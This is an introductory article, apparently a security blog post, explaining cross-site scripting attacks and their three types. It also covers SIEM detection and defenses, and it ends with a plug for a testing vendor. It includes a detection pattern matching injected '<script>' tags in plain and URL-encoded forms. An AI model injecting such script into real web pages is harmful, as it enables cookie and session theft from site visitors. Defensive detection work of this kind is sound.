Cross Site Scripting (XSS) Attacks
Cross Site Scripting Attacks (XSS) are a types of injection attack in which malicious codes are injected into website. These websites, otherwise, looks benign and trusted. Hackers have discovered numerous and ingenious methods for injecting malicious code into websites via Common Gateway Interface (CGI) scripts, web server software vulnerabilities, SQL injection attacks, frame exploitation, DNS redirects, cookie hijacks, and many other forms of attack.
In XSS attacks, an attacker sends a malicious code using a web application to an unsuspecting user, generally in the form of specially crafted links. Crafted code will get executed when the user visit the link, and then harm is done. Change in behavior or appearance of the website, action performed on behalf of the user, or stealing personal information are simple examples of successful XSS attack.
XSS can, thus, be thought of as a security bug or flaw that affects websites. A flaw that can occur anywhere a web application accepts input from a user and generates output without proper validation.
A successful XSS attack can result in identity theft, credential theft, data theft, financial losses, or the planting of remote-control software on visiting clients.
Thus,
- XSS attacks enable an attacker to inject their malicious code (in client-side scripting languages, such as JavaScript) into vulnerable web pages.
- When an unsuspecting user visits the infected page, the malicious code executes on the victim’s browser and may lead to stolen cookies, hijacked sessions, malware execution, or bypassed access control, or aid in exploiting browser vulnerabilities.
There are three different XSS vulnerabilities:
- Nonpersistent (reflected) XSS vulnerabilities: Attacker tricks the victim into processing a URL programmed with a rogue script to steal the victim’s sensitive information (cookie, session ID, etc.). The principle behind this attack lies in exploiting the lack of proper input or output validation on dynamic websites.
- Persistent (stored or second-order) XSS vulnerabilities: It is targeted at websites that allow users to input data that is stored in a database or any other such location, e.g., forums, message boards, guest books, etc. The attacker posts some text that contains some malicious JavaScript, and when other users later view the posts, their browsers render the page and execute the attacker’s JavaScript.
- DOM (Document Object Model or local XSS)–based XSS vulnerabilities: DOM is the standard structure layout to represent HTML and XML documents in the browser. In such attacks the document components such as form fields and cookies can be referenced through JavaScript. The attacker uses the DOM environment to modify the original client-side JavaScript. This causes the victim’s browser to execute the resulting abusive JavaScript code.
Where should you collect logs from?
Web Server, Web Application Firewall, IDS/IPS logs
How to detect using SIEM?
There are certain common code that needs to be injected for the attack to be successful. <script> tag is present in log whenever XSS attack is seen in URL field.
URL can be have any of value in this list
[*<script>*, *%3c%73%63%72%69%70%74%3e*, *%3cscript%3e*]
How to defend against XSS?
As an administrator you can do following
- maintain a patched web server,
- use web application firewalls,
- operate a host-based intrusion detection system (HIDS),
- audit for suspicious activity, and,
- most important, performing server-side input validation for length, malicious content, and metacharacter filtering.
As a web user you can do following
- keep your system patched,
- run antivirus software, and
- avoid non-mainstream websites.
For web application and penetration testing, there are different vendors out there that provide such services. Security for Everyone (S4E) is one such vendor which provide various professional services.